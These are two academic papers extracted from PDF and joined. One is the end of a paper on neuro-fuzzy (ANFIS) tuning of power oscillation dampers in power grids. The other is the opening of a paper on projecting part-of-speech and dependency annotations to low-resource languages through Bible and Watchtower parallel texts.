the damping function on the control signal of UPFC for damping of power system electromechanical oscillations was proposed in [7]-[8]. The acronym ANFIS derives its name from adaptive neuro-fuzzy inference system. Using a given input/output data set, the toolbox function ANFIS constructs a fuzzy inference system (FIS) whose membership function parameters are tuned (adjusted) using either a back propagation algorithm alone, or in combination with a least squares type of method. This allows fuzzy systems to learn from the data they are modeling [8]. It has a network-type structure similar to that of a neural network. Thus, it maps inputs through input membership functions and associated DOI: 10.21307/ijanmc-2019-016 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 18 parameters and then through output membership functions and associated parameters to outputs, can be used to interpret the input/output map. The parameters associated with the membership functions will change through the learning process. The computation of these parameters (or their adjustment) is facilitated by a gradient vector, which provides a measure of how well the fuzzy inference system is modeling the input/output data for a given set of parameters [9]-[10]. Once the gradient vector is obtained, any of several optimization routines could be applied in order to adjust the parameters so as to reduce some error measure (usually defined by the sum of the squared difference between actual and desired outputs) [11]-[12]. III. PROPOSED METHOD A. Fuzzy System Modeling and Controller Philosophy INPUT OUTPUT 1 x n x 1 y   n y UNKNOWN SYSTEM Figure 2. An unknown System as a Black Box In the unknown system in Figure 2 only a set of input, and output can be measured. The mathematical description relating the input to the output can be a mathematical formula, such as a mapping or a function that relates the input to the output in the form          or a set of differential equations in the form            or a logical linguistic statement which can be quantified mathematically in the form: IF (input ) AND … AND (input ) (3) THEN (output ) AND …. AND (output ) Fuzzy systems modeling is to quantify the logical form of equation (3.51) by using Fuzzy logic and the mathematical functional model of equation (3.49) or by using Fuzzy logic together with the differential equation model of equation (3.50). The fuzzy logic controller comprises of four stages: fuzzification, a knowledge base, decision making and defuzzification. The fuzzification interface converts input data into suitable linguistic values that can be viewed as label fuzzy sets. To obtain a deterministic control action, a defuzzification strategy is required. Defuzzification is a mapping from a space of fuzzy control actions defined over an output universe of discourse into a space of nonfuzzy (crisp) control actions. The defuzzification of the variables into crisp outputs is tested by using the weighted average method. After generating the fuzzy inference, the generated information describing the model’s structure and parameters of both the input and output variables are used in the ANFIS training phase. This information will be fine-tuned by applying the hybrid learning or the backpropagation schemes. The algorithm employed for ANFIS training is shown in Figure 3. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 19 INVOKE THE COMMAND LINE ANFIS TRAINING ROUTINE AND PROVIDE THE FOLLOWING INPUT ARGUMENT: EPOCH NUMBER, GENFIS OUTPUT, AND THE TRAINING DATA PLOT THE TRAINING DATA AND THE OUTPUT IS OUTPUT SATISFACTORY ? END YES INCREASE NO OF MEMBER FUNCTION AND EPOCH NUMBER START GENERATE INPUT/ OUTPUT TRAINING DATA SET THE GENFIS INPUT PARAMETERS:NUMBER OF MEMBERSHIP FUNCTIONS, MEMBERSHIP FUNCTION TYPE e.t.c NO PLOT THE OUTPUT MEMBERSHIP FUNCTION AND THE INPUT/OUTPUT DATA Figure 3. Flowchart of ANFIS Training IV. RESULTS AND DISCUSSIONS Power Oscillation Dampers were designed for UPFC embedded in two test case study systems: a) Kundur Two Area System b) Nigerian 330kV National Grid However the optimal performance of these PODs are only guaranteed at the particular operating points under consideration, but at any other operating points, different values of time constant must be determined for the damping to be effective A. Result of ANFIS Training (Test System 1) The training data and check data are generated by randomly varying the load (multiplying the load with a factor of 0.1) in the two areas of the test system. At each operating point the actual values of POD parameters were calculated. The ANFIS parameter settings are as shown in Table 1. Fig 4 is the plot of training data and ANFIS output for lead time constant while Figure 5 is the graph of check data and ANFIS output for lead time constant. The plot of the error associated with the training is shown in Figure 6 for both the check data and training data. The corresponding plots for lag time constant are shown in Figures 7 to Figure 9. TABLE I. ANFIS PARAMETER SETTINGS numMFs 5 mfType 'gbellmf' epoch_n 20 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 20 Figure 4. Training Data and ANFIS Output: Lead Time Constant Figure 5. Check Data and ANFIS Output: Lead Time Constant Figure 6. Prediction Error for Training Data and Check Data: Lead Time Constant 3.79 3.8 3.81 3.82 3.83 3.84 3.85 3.86 3.87 3.88 0.13 0.135 0.14 0.145 0.15 0.155 0.16 MODULUS OF EIGENVALUE LE AD T IM E CO NS TA NT PLOT OF TRAINING DATA AND ANFIS OUTPUT:LEAD TIME CONSTANT TRAINING DATA ANFIS OUTPUT 3.7 3.72 3.74 3.76 3.78 3.8 3.82 3.84 3.86 3.88 3.9 0.13 0.14 0.15 0.16 0.17 0.18 0.19 PLOT OF CHECK DATA AND ANFIS OUTPUT:LEAD TIME CONSTANT LE AD T IM E CO NS TA NT MODULUS OF EIGENVALUE CHECK DATA ANFIS OUTPUT 3.79 3.8 3.81 3.82 3.83 3.84 3.85 3.86 3.87 3.88 -4 -2 0 2 4 x 10 -4 TRAINING DATA ERROR FOR LEAD TIME CONSTANT ER RO R MODULUS OF EIGENVALUE 3.7 3.72 3.74 3.76 3.78 3.8 3.82 3.84 3.86 3.88 3.9 -2 0 2 4 x 10 -4 CHECK DATA ERROR FOR LEAD TIME CONSTANT ER RO R MODULUS OF EIGENVALUE International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 21 Figure 7. Training Data and ANFIS Output: Lag Time Constant Figure 8. Check Data and ANFIS Output: Lag Time Constant Figure 9. Prediction Error for Training Data and Check Data: Lag Time Constant B. Result of ANFIS Training (Test System 2) The data for training were obtained by randomly varying the load in different areas by a factor of 0.01 from low to medium and high values for about 500 scenarios, the data were divided into training data and check data. The lead-lag time constants were recorded as they change with operating conditions as well as the lead and lag time constants that provide the best damping under different operating conditions. The results obtained for lag time constant are as shown in Figures 10 to 12. Figure 13 to 14 are the corresponding results for lead time constant. Figure 15 is the graph of the input membership function while Figures 16 and 17 are the graphs of the ANFIS adjusted membership function that gives the exact simulation of the training data for the lag time constant and lead time constant respectively. 3.79 3.8 3.81 3.82 3.83 3.84 3.85 3.86 3.87 3.88 0.44 0.45 0.46 0.47 0.48 0.49 0.5 0.51 0.52 0.53 MODULUS OF EIGENVALUE LA G T IM E CO NS TA NT PLOT OF TRAINING DATA AND ANFIS OUTPUT:LAG TIME CONSTANT ANFIS OUTPUT TRAINING DATA 3.7 3.72 3.74 3.76 3.78 3.8 3.82 3.84 3.86 3.88 3.9 0.36 0.38 0.4 0.42 0.44 0.46 0.48 0.5 0.52 0.54 MODULUS OF EIGENVALUE LA G TI ME C ON ST AN T PLOT OF CHECK DATA AND ANFIS OUTPUT:LAG TIME CONSTANT ANFIS OUTPUT CHECK DATA 3.79 3.8 3.81 3.82 3.83 3.84 3.85 3.86 3.87 3.88 -1 -0.5 0 0.5 1 x 10 -3 TRAINING DATA ERROR FOR LAG TIME CONSTANT E R R O R MODULUS OF EIGENVALUE 3.7 3.72 3.74 3.76 3.78 3.8 3.82 3.84 3.86 3.88 3.9 -5 0 5 10 x 10 -4 CHECK DATA ERROR FOR LAG TIME CONSTANT E R R O R MODULUS OF EIGENVALUE International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 22 Figure 10. Plot of ANFIS Data and Training Data: Lag Time Constant Figure 11. Plot of ANFIS Data and Check Data: Lag Time Constant Figure 12. Prediction Error for Training Data and Check Data 3.82 3.83 3.84 3.85 3.86 3.87 3.88 3.89 0.215 0.22 0.225 0.23 MODULUS OF EIGENVALUE LA G T IM E CO NS TA NT PLOT OF TRAINING DATA AND ANFIS OUTPUT:LAG TIME CONSTANT TRAINING DATA ANFIS OUTPUT 3.8 3.85 3.9 3.95 0.205 0.21 0.215 0.22 0.225 0.23 0.235 MODULUS OF EIGENVALUE LA G T IM E CO NS TA NT PLOT OF CHECK DATA AND ANFIS OUTPUT:LAG TIME CONSTANT ANFIS OUTPUT CHECK DATA 3.8 3.85 3.9 3.95 -4 -2 0 2 4 x 10 -4 CHECK DATA ERROR FOR LAG TIME CONSTANT E R R O R MODULUS OF EIGENVALUE 3.82 3.83 3.84 3.85 3.86 3.87 3.88 3.89 -1 -0.5 0 0.5 1 x 10 -4 TRAINING DATA ERROR FOR LAG TIME CONSTANT E R R O R MODULUS OF EIGENVALUE International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 23 Figure 13. Plot of ANFIS Output and Training Data: Lead Time Constant Figure 14. Plot of ANFIS Data and Check Data: Lead Time Constant Figure 15. Prediction Error for Training Data and Check Data Figure 16. Input Membership Function 3.82 3.83 3.84 3.85 3.86 3.87 3.88 3.89 0.0805 0.081 0.0815 0.082 0.0825 0.083 0.0835 0.084 0.0845 0.085 0.0855 MODULUS OF EIGENVALUE LE AD T IM E CO NS TA NT PLOT OF TRAINING DATA AND ANFIS OUTPUT:LEAD TIME CONSTANT ANFIS OUTPUT TRAINING DATA 3.8 3.85 3.9 3.95 0.078 0.08 0.082 0.084 0.086 0.088 0.09 MODULUS OF EIGENVALUE LE AD T IM E CO NS TA NT PLOT OF CHECK DATA AND ANFIS OUTPUT:LEAD TIME CONSTANT ANFIS OUTPUT CHECK DATA 3.8 3.85 3.9 3.95 -2 0 2 4 x 10 -4 CHECK DATA ERROR FOR LEAD TIME CONSTANT ER RO R MODULUS OF EIGENVALUE 3.82 3.83 3.84 3.85 3.86 3.87 3.88 3.89 -1 -0.5 0 0.5 1 x 10 -4 TRAINING DATA ERROR FOR LEAD TIME CONSTANT ER RO R MODULUS OF EIGENVALUE 5.422 5.424 5.426 5.428 5.43 5.432 5.434 5.436 0 0.2 0.4 0.6 0.8 1 INPUT: MODULUS OF EIGENVALUES DE GR EE O F ME MB ER SH IP in1mf1 in1mf2 in1mf3 in1mf4 in1mf5 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 24 Figure 17. ANFIS Adjusted Membership Function: Lag Time Constant Figure 18. ANFIS Adjusted Membership Function: Lead Time Constant V. CONCLUSION In this work an adaptive neuro fuzzy controller has been developed for the purpose of coordinating the changes in power oscillation damper parameters with variation in power system operating point. The accuracy with which the controller was able to predict the values of POD parameters clearly reveals the effectiveness of the proposed approach. REFERENCES [1] Chia, B.H.K., S. Morris and P.K. Dash, 2004. “A Fuzzy-Feedback Linearizing Nonlinear Control of CSI Based STATCOM for Synchronous Generator Stabilization”, Proceedings of the IEEE International Conference on Control Applications, vol. 2, September, pp 1473-1478. [2] External Neuro-control for a Series Capacitive Reactance Compensator Based on a Voltage Source PWM Converter in Damping Power Oscillations”, IEEE Transactions on Industrial Electronics, vol. 54, no. 1, February 2007, pp. 77-85. [3] J. R. Jang, “ANFIS Adaptive-netwok-Based Fuzzy Inference System”, IEEE Transactions on Systems, Man and Cybernetics, vol. 23, no. 3, 1993, pp. 665-685. [4] S. P. Ghoshal, “Multi-Area Frequency and Tie-Line Power Flow Control with Fuzzy Logic Based Integral Gain Scheduling”, IE (I) Journal-EI, vol. 84, December 2003, pp. 135-141. [5] Fuzzy Logic Toolbox—for Use with Matlab, The Mathworks Inc, 1999. [6] T. R. Sumithira and A. Nirmal Kumar, “Elimination of Harmonics in Multilevel Inverters Connected to Solar Photovoltaic Systems Using ANFIS: An Experimental Case Study”, Journal of Applied Research and Technology, vol. 11, no. 1, February 2013, pp. 124-132. [7] Jyh-Shing Roger Jang.: ‘ANFIS: Adaptive-Network-Based Fuzzy Inference System’, IEEE Trans. Syst. Man and Cyber., 23, (3), 1993,pp. 665-685 [8] E.V. Larsen, Juan.J, Sanchez-Gasca and Chow.J.H.‘Concept for design of FACTS controllers to damp power swings’, IEEE Transactions 1995,PWRS-2 (10), pp.948-956. [9] C R Houck, J Joines and M Kay.” Genetic Algorithm Optimization Toolbox, User’s Manual” Version 5.0, 1996 [10] Jang, J.-S. R. and N. Gulley, "Gain scheduling based fuzzy controller design," Proc. of the International Joint Conference of the North American Fuzzy Information Processing Society Biannual Conference, the Industrial Fuzzy Control and Intelligent Systems Conference, and the NASA Joint Technology Workshop on Neural Network and Fuzzy Logic, San Antonio, Texas, Dec. 1994. [11] Jang, J.-S. R. and C.-T. Sun, "Neuro-fuzzy modeling and control, Proceedings of the IEEE, March 1995. [12] Jang, J.-S. R. and C.-T. Sun, Neuro-Fuzzy and Soft Computing: A Computational Approach to Learning and Machine Intelligence, Prentice Hall, 1997. [13] Kaufmann, A. and M.M. Gupta, Introduction to Fuzzy Arithmetic, V.N. Reinhold, 1985. 5.422 5.424 5.426 5.428 5.43 5.432 5.434 5.436 0 0.2 0.4 0.6 0.8 1 INPUT: MODULUS OF EIGENVALUES DE G RE E O F M EM BE RS HI P in1mf1 in1mf2in1mf3 in1mf4in1mf5 ADJUSTED MEMBERSHIP FUNCTIONS: LAG TIME CONSTANT 5.422 5.424 5.426 5.428 5.43 5.432 5.434 5.436 0 0.2 0.4 0.6 0.8 1 INPUT: MODULUS OF EIGENVALUES DE GR EE OF M EM BE RS HIP in1mf1in1mf2in1mf3 in1mf4 in1mf5 ANFIS ADJUSTED MEMBERSHIP FUNCTION: LEAD TIME CONSTANT work_5sg54cik6vhyno33zefmwbmjyy ---- Multilingual Projection for Parsing Truly Low-Resource Languages Željko Agić♥ Anders Johannsen♥ Barbara Plank♥♣ Héctor Martı́nez Alonso♥♠ Natalie Schluter♥♦ Anders Søgaard♥ ♥ Center for Language Technology, University of Copenhagen, Denmark ♣ Center for Language and Cognition, University of Groningen, The Netherlands ♠ Univ. Paris Diderot, Sorbonne Paris Cité – Alpage, INRIA, France ♦ MobilePay, Copenhagen, Denmark {zeljko.agic,soegaard}@hum.ku.dk Abstract We propose a novel approach to cross-lingual part-of-speech tagging and dependency pars- ing for truly low-resource languages. Our an- notation projection-based approach yields tag- ging and parsing models for over 100 lan- guages. All that is needed are freely avail- able parallel texts, and taggers and parsers for resource-rich languages. The empirical evalu- ation across 30 test languages shows that our method consistently provides top-level accu- racies, close to established upper bounds, and outperforms several competitive baselines. 1 Introduction State-of-the-art approaches to inducing part-of- speech (POS) taggers and dependency parsers only scale to a small fraction of the world’s ∼6,900 lan- guages. The major bottleneck is the lack of man- ually annotated resources for the vast majority of these languages, including languages spoken by mil- lions, such as Marathi (73m), Hausa (50m), and Kur- dish (30m). Cross-lingual transfer learning—or sim- ply cross-lingual learning—refers to work on using annotated resources in other (source) languages to induce models for such low-resource (target) lan- guages. Even simple cross-lingual learning tech- niques outperform unsupervised grammar induction by a large margin. Most work in cross-lingual learning, however, makes assumptions about the availability of linguis- tic resources that do not hold for the majority of low-resource languages. The best cross-lingual de- pendency parsing results reported to date were pre- sented by Rasooli and Collins (2015). They use the intersection of languages covered in the Google dependency treebanks project and those contained in the Europarl corpus. Consequently, they only consider closely related Indo-European languages for which high-quality tokenization can be obtained with simple heuristics. In other words, we argue that recent approaches to cross-lingual POS tagging and dependency pars- ing are biased toward Indo-European languages, in particular the Germanic and Romance families. The bias is not hard to explain: treebanks, as well as large volumes of parallel data, are readily available for many Germanic and Romance languages. Several factors make cross-lingual learning between these languages easier: (i) We have large volumes of rela- tively representative, translated texts available for all language pairs; (ii) It is relatively easy to segment and tokenize Germanic and Romance texts; (iii) These languages all have very similar word order, making the alignments much more reliable. There- fore, it is more straightforward to train and evaluate cross-lingual transfer models for these languages. However, this bias means that we possibly over- estimate the potential of cross-lingual learning for truly low-resource languages, i.e., languages with no supporting tools or resources for segmentation, POS tagging, or dependency parsing. The aim of this work is to experiment with cross- lingual learning via annotation projection, making minimal assumptions about the available linguistic resources. We only want to assume what we can in fact assume for truly low-resource languages. Thus, for the target languages, we do not assume the avail- 301 Transactions of the Association for Computational Linguistics, vol. 4, pp. 301–312, 2016. Action Editor: Chris Quirk. Submission batch: 1/2016; Revision batch: 4/2016; 5/2016; 7/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. ability of any labeled data, tag dictionaries, typo- logical information, etc. For annotation projection, we need a parallel corpus, and we therefore have to rely on resources such as the Bible (parts of which are available in 1,646 languages), and publications from the Watchtower Society (up to 583 languages). These texts have the advantage of being translated both conservatively and into hundreds of languages (massively multi-parallel). However, the Bible and the Watchtower are religious texts and are more bi- ased than the corpora that have been assumed to be available in most previous work. In order to induce high-quality cross-lingual transfer models from noisy and very limited data, we exploit the fact that the available resources are massively multi-parallel. We also present a novel multilingual approach to the projection of depen- dency structures, projecting edge weights (rather than edges) via word alignments from multiple sources (rather than a single source). Our approach enables us to project more information than previ- ous approaches: (i) by postponing dependency tree decoding to after the projection, and (ii) by exploit- ing multiple information sources. Our contributions are as follows: (i) We present the first results on cross-lingual learning of POS taggers and dependency parsers, assuming only linguistic resources that are available for most of the world’s writ- ten languages, specifically, Bible excerpts and translations of the Watchtower. (ii) We extend annotation projection of syntactic dependencies across parallel text to the multi- source scenario, introducing a new, heuristics- free projection algorithm that projects weight matrices from multiple sources, rather than dependency trees or individual dependencies from a single source. (iii) We show that our approach performs signifi- cantly better than commonly used heuristics for annotation projection, as well as than delexi- calized transfer baselines. Moreover, in com- parison to these systems, our approach per- forms particularly well on truly low-resource non-Indo-European languages. All code and data are made freely available for general use.1 2 Weighted annotation projection Motivation Our approach is based on the gen- eral idea of annotation projection (Yarowsky et al., 2001) using parallel sentences. The goal is to aug- ment an unannotated target sentence with syntactic annotations projected from one or more source sen- tences through word alignments. The principle is illustrated in Figure 1, where the source languages are German and Croatian, and the target is English. The simplest case is projecting POS labels, which are observed in the source sentences but unknown in the target language. In order to induce the gram- matical category of the target word beginning, we project POS from the aligned words Anfang and početku, both of which are correctly annotated as NOUN. Projected POS labels from several sources might disagree for various reasons, e.g., erroneous source annotations, incorrect word alignments, or legitimate differences in POS between translation equivalents. We resolve such cases by taking a ma- jority vote, weighted by the alignment confidences. By letting several languages vote on the correct tag of each word, our projections become more robust, less sensitive to the noise in our source-side predic- tions and word alignments. We can also project syntactic dependencies across word alignments. If (us,vs) is a dependency edge in a source sentence, say the ingoing dependency from das to Wort, us (Wort) is aligned to ut (word), and vs (das) is aligned to vt (the), we can project the depen- dency such that (ut,vt) becomes a dependency edge in the target sentence, making the a dependent of word. Obviously, dependency annotation projection is more challenging than projecting POS, as there is a structural constraint: the projected edges must form a dependency tree on the target side. Hwa et al. (2005) were the first to consider this problem, applying heuristics to ensure well-formed trees on the target side. The heuristics were not per- fect, as they have been shown to result in excessive non-projectivity and the introduction of spurious re- lations and tokens (Tiedemann et al., 2014; Tiede- mann, 2014). These design choices all lead to di- 1https://bitbucket.org/lowlands/release 302 https://bitbucket.org/lowlands/release Figure 1: An outline of dependency annotation projection, voting, and decoding in our method, using two sources i (German) and j (Croatian) and a target t (English). Part 1 represents the multi-parallel corpus preprocessing, while parts 2 and 3 relate to our projection method. The graphs are represented as adjacency matrices with column indices encoding dependency heads. We highlight how the weight of target edge (ut = was,vt = beginning) is computed from the two contributing sources. minished parsing quality. We introduce a heuristics-free projection algo- rithm. The key difference from most previous work is that we project the whole set of potential syn- tactic relations with associated weights—rather than binary dependency edges—from a large number of multiple sources. Instead of decoding the best tree on the source side—or for a single source-target sen- tence pair—we project weights prior to decoding, only decoding the aggregated multi-source weight matrix after the individual projections are done. This means that we do not lose potentially relevant infor- mation, but rather project dense information about all candidate edges. 2.1 Multi-source sentence graph We assume the existence of n source languages and a target language t. For each tuple of translations in our multi-parallel corpus, our algorithm projects syntactic annotations from the n source sentences to the target sentence. Projection happens at the sentence-level, taking a tuple of n annotated sentences and an unannotated sentence as input. We formalize the projection step as label propagation in a graph structure where the words of the target and source sentences are vertices, while edges represent dependency edge candidates between words within a sentence (a parse), as well as similarity relations between words of sentences in different languages (word alignments). Formally, a projection graph is a graph G = (V,E). All edges are weighted by the function we : E → R. The vertices can be decomposed into sets V = V0 ∪·· ·∪Vn, where Vi is the set of words in sentence i. We often need to identify the target sentence Vt = V0 and the source sentences Vs = V1 ∪·· ·∪Vn sep- arately. Edges between Vs and Vt are the result of word alignments. The alignment subgraph is the bi- partite graph A = (Vs,Vt,EA), i.e., the subgraph of G induced by all (alignment) edges, EA, connecting Vs and Vt. The subgraph induced by the set of vertices Vi, written as G[Vi], represents the dependency edge candidates between the words of the sentence i. In general these subgraphs are dense, i.e., they encode weight matrices of edge scores and not just the sin- gle best parse. For the source sentences, we assume that the weights are provided by a parser, while the weights for the syntactic relations of the target sen- tence are unknown. With the above definitions, the dependency pro- jection problem amounts to assigning weights to the edges of G[Vt] by transferring the syntactic parse graphs G[V1], . . . ,G[Vn] from the source languages through the alignments A. 2.2 Part-of-speech projection Our annotation projection for POS tagging is simi- lar to the one proposed by Agić et al. (2015). The algorithm is presented in Algorithm 1. We first in- troduce a conditional probability distribution p(l|v) 303 Algorithm 1: Project POS tags Data: A projection graph G = (Vs ∪Vt,E); a set of POS labels L; a function p(l|v) assigning probabilities to labels l for word vertices v. Result: A labeling of Vt p̃ ← empty probability table label ← empty label-to-vertex mapping for vt ∈ Vt do for l ∈ L do p̃(l|vt) ← ∑ vs∈Vs p(l|vs)wa(vs,vt) label(vt) ← arg maxl p̃(l|vt) return label Algorithm 2: Project dependencies Data: A projection graph G = (Vs ∪Vt,E). Result: A dependency tree covering the target vertices Vt. if project from trees then for i=1 to n do G[Vi] ← DMST(G[Vi]) for (ut,vt) ∈ G[Vt] do we(ut,vt) ←−∞ if (·,ut) or (·,vt) /∈ EA then continue we(ut,vt) ← n∑ i=1 max us,vs∈Vi we(us,vs) wa(us,ut) wa(vs,vt) G[Vt] ← normalize(G[Vt]) return DMST(G[Vt]) over POS tags l ∈ L for each vertex v in the graph. For all source vertices, the probability distributions are obtained by tagging the corresponding sentences in our multilingual corpus with POS taggers, assign- ing a probability of one to the best tag for each word, and zero for all other tags. For each target token, i.e., each vertex v, the projection works by gathering ev- idence for each tag from all source tokens aligned to v, weighted by the alignment score: p(l|vt) ∝ ∑ vs∈Vs p(l|vs) wa(vs,vt) The projected tag for a target vertex vt is then arg maxl p(l|vt). When both the alignment weights and the source tag probabilities are in {0,1}, this reduces to a simple voting scheme that assigns the most frequent POS tag among the aligned words to each target word. 2.3 Dependency projection While in POS projection, we project vertex labels, in dependency projection we project edge scores. Our procedure for dependency annotation projection is given in Algorithm 2. For each source language, we parse the corresponding side of our multi-parallel corpus using a dependency parser trained on the source language treebank. However, instead of de- coding to dependency trees, we extract the weights for all potential syntactic relations, importing them into G as edge weights. The parser we use in our experiments assigns scores we ∈ R to possible edges. Since the ranges and values of these scores are dependent on the train- ing set size and the number of model updates, we standardize the scores to make them comparable across languages. Standardization centers the scores around zero with a standard deviation of one by sub- tracting the mean and dividing by the standard devi- ation. We apply this normalization per sentence. Scores are then projected from source edges to target edges via word alignments wa ∈ [0,1]. In- stead of voting among the incoming projections from multiple sources, we sum the projected edge scores. Because alignments vary in quality, we scale the score of the projected source edge by the corre- sponding alignment probability. A target edge (ut,vt) ∈ G[Vt] can originate from multiple source edges even from a single source sen- tence, due to m : n alignments. In such cases, we only project the source edge (us,vs) ∈ G[Vi>0] with the maximum score, provided the words are aligned, i.e., (us,ut) and (vs,vt) ∈ EA. In the case of a single source sentence pair, the target edge scores are set as follows: we(ut,vt) ← max us,vs∈Vi edge︷︸︸︷ we(us,vs) alignment︷︸︸︷ wa(us,ut)wa(vs,vt) We note the distinction between edge weights we and alignment weights wa. With multiple sources, 304 the target edge scores we(ut,vt) are computed as a sum over the individual sources: n∑ i=1 max us,vs∈Vi we(us,vs) wa(us,ut) wa(vs,vt) After projection we have a dense set of weighted edges in the target sentence representing possible syntactic relations. This structure is equivalent to the n × n edge matrix used in ordinary first-order graph-based dependency parsing. Before decoding, the weights are softmax- normalized to form a distribution over each possible head decision. The normalization balances out the contributions of the individual head decisions; and in our development setup, we found that omitting this step resulted in a substantial (∼10%) decrease in parsing performance. We then follow McDonald et al. (2005) in using directed maximum spanning tree (DMST) decoding to identify the best dependency tree in the matrix. We note that DMST decoding on summed projected weight matrices is similar to the idea of re-parsing with DMST decoding of the output on an ensemble of parsers (Sagae and Lavie, 2006), which we use as a baseline in our experiments. 3 Data 3.1 Training and test sets We use source treebanks from the Universal De- pendencies (UD) project, version 1.2 (Nivre et al., 2015).2 They are harmonized in terms of POS tag inventory (17 tags) and dependency annotation scheme. In our experiments, we use the canoni- cal data splits, and disregard lemmas, morphological features and alternative POS from all treebanks. Out of the 33 languages currently in UD1.2, we drop languages for which the treebank does not dis- tribute word forms (Japanese), and languages for which we have no parallel unlabeled data (Latin, Ancient Greek, Old Church Slavonic, Irish, Gothic). Languages with more than 60k tokens (in the train- ing data) are considered source languages, the re- maining 6 smaller treebanks (Estonian, Greek, Hun- garian, Latin, Romanian, Tamil) are strictly consid- ered targets. This results in 22 treebanks for training 2http://hdl.handle.net/11234/1-1548 source taggers and parsers. We use two additional test sets: Quechua and Serbian. The first one does not entirely adhere to UD, but we provide a POS tagset mapping and a few modifications and include it as a test language to deepen the robustness assess- ment for our approach across language families. The Serbian test set fully conforms to UD, as a fork of the closely related Croatian UD dataset.3 This results in a total of 30 target languages. 3.2 Multi-parallel corpora We use two sources of massively parallel text. The first is the Edinburgh Bible Corpus (EBC) collected by Christodouloupoulos and Steedman (2014) con- taining 100 languages. EBC has either 30k or 10k sentences for each language, depending on whether they are made up of full Bibles or just translations of the New Testament, respectively. We also crawled and scraped the Watchtower Online Library website to collect what we will refer to as the Watchtower Corpus (WTC).4 The data is from 2002-2016 and the final corpus contains 135 languages with sentences in the range of 26k-145k. While some EBC Bibles are written in dated language, we do not make any modifications to the corpus if the language is also present in WTC. However, as Basque is not repre- sented in WTC, we replace the Basque Bible from 1571 with a contemporary version from 2004, to en- able the use of Basque in the parsing experiments.5 EBC and WTC both consist of religious texts, but they are very different in terms of style and con- tent. If we examine Table 1 that shows the most frequent words per corpus, we observe that the En- glish Bible—the King James Version from 1611— contains many Old English verb forms (“hath”, “giveth”). In contrast, the English Watchtower is written in contemporary English, both in terms of verb inflection (“does”, “says”) and vocabulary (“to- day”, “human”). WTC also deals with contempo- rary topics such as blood “transfusion” (36 men- tions) and “computer” (42 mentions). The other languages also show differences in terms of language modernity and dialectal difference between EBC and WTC. While each Bible transla- tion has its individual history, Watchtower transla- 3https://github.com/ffnlp/sethr 4http://wol.jw.org 5http://www.biblija.net/biblija.cgi?l=eu 305 http://hdl.handle.net/11234/1-1548 https://github.com/ffnlp/sethr http://wol.jw.org http://www.biblija.net/biblija.cgi?l=eu EBC: hath, saith, hast, spake, yea, cometh, iniquity, wilt, smote, shew, begat, doth, lo, hearken, thence, verily, neighbour, goeth, shewed, giveth, smite, didst, wherewith, knoweth, night WTC: bible, does, however, says, today, during, show, human, later, important, really, humans, meetings, personal, states, future, fact, relationship, result, at- tention, someone, century, attitude, article, different Table 1: The 25 most frequent words exclusive to the English Bible or Watchtower. tions are commissioned by the same publisher, fol- lowing established editorial criteria. Thus, we not only expect Watchtower to yield projected treebanks that are closer to contemporary language, but also more reliable alignments. We expect these proper- ties to make WTC a more suitable parallel corpus for our experiments and for bootstrapping treebanks for new languages. 3.3 Preprocessing Segmentation For the multi-parallel corpora, we apply naive sentence splitting using full-stops, ques- tion marks and exclamation points of the alphabets from our corpora. We have collected these trigger symbols from the corpora, provided that they ap- peared as individual tokens at the ends of lines, and belonged to the “Punctuation, Other” Unicode cate- gory. After sentence splitting, we use naive whites- pace tokenization.6 We also remove short-vowel di- acritics from all corpora written in Arabic script. We use the same sentence splitting and tokeniza- tion for EBC and WTC. This is done regardless of Bibles being distributed in a verse-per-line format, which means verses can be split in more than one sentence. The average sentence length across lan- guages is 18.5 tokens in EBC and 16.7 in WTC. The UD treebank tokenization differs from the to- kenization used for the multi-parallel corpora. The UD dependency annotation is based on syntactic words, and the tokenization guidelines recommend, for example, splitting clitics from verbs, and undo- ing contractions (Spanish “del” becomes “de el”). These tokens made up of several syntactic words are 6https://github.com/bplank/ multilingualtokenizer called multiword tokens in the UD convention, and are included in the treebanks but are not integrated in the dependency trees, i.e., only their forming subto- kens are assigned a syntactic head.7 In order to harmonize the tokenization, we eliminate subtokens from the dependency trees, and incorporate the orig- inal multiword tokens—which are more likely to be naive raw tokens—in the trees instead. For each multiword token, we provide it with POS and de- pendency label from the highest subtoken, namely the subtoken that is closest to root. For example, in the case of a verb and its clitics, the chosen subtoken is the verb, and the multiword token is interpreted as a verb. If there are more candidates, we select one through POS ranking.8 Alignment We sentence- and word-align all lan- guage pairs in both our multi-parallel corpora. We use hunalign (Varga et al., 2005) to perform con- servative sentence alignment.9 The selected sen- tence pairs then enter word alignment. Here, we use two different aligners. The first one is IBM2 fastalign by Dyer et al. (2013), where we adopt the setup of Agić et al. (2015) who observe a ma- jor advantage in using reverse-mode alignment for POS projection (4-5 accuracy points absolute).10 In addition, we use the IBM1 aligner efmaral11 by Östling (2015). The intuition behind using IBM1 is that IBM2 introduces a bias toward more closely related languages, and we confirm this intuition through our experiments. We modify both aligners so that they output the alignment probability for each aligned token pair. Tagging and parsing The source-sides of the two multi-parallel corpora, EBC and WTC, are POS- tagged by taggers trained on the respective source languages, using TnT (Brants, 2000). We parse the corpora using TurboParser (Martins et al., 2013). The parser is used in simple arc-factored mode with pruning.12 We alter it to output per-sentence arc 7http://universaldependencies.org/ format.html 8https://github.com/coastalcph/ ud-conversion-tools. 9Parameters used: utf, bisent, cautious, realign. 10Parameters used: d, o, v, r. 11Also reverse mode, with default settings, see https:// github.com/robertostling/efmaral. 12Parameters used: basic. 306 https://github.com/bplank/multilingualtokenizer https://github.com/bplank/multilingualtokenizer http://universaldependencies.org/format.html http://universaldependencies.org/format.html https://github.com/coastalcph/ud-conversion-tools https://github.com/coastalcph/ud-conversion-tools https://github.com/robertostling/efmaral https://github.com/robertostling/efmaral weight matrices.13 4 Experiments Outline For each sentence in a target language corpus, we retrieve the aligned sentences in the source corpora. Then, for each of these source-target sentence pairs, we project POS tags and dependency edge scores via word alignments, aggregating the contributions of individual sources. Once all con- tributions are collected, we perform a per-token ma- jority vote on POS tags and DMST decoding on the summed edge scores. This results in a POS-tagged and dependency parsed target sentence ready to con- tribute in training a tagger and parser. We remove target language sentences that contain 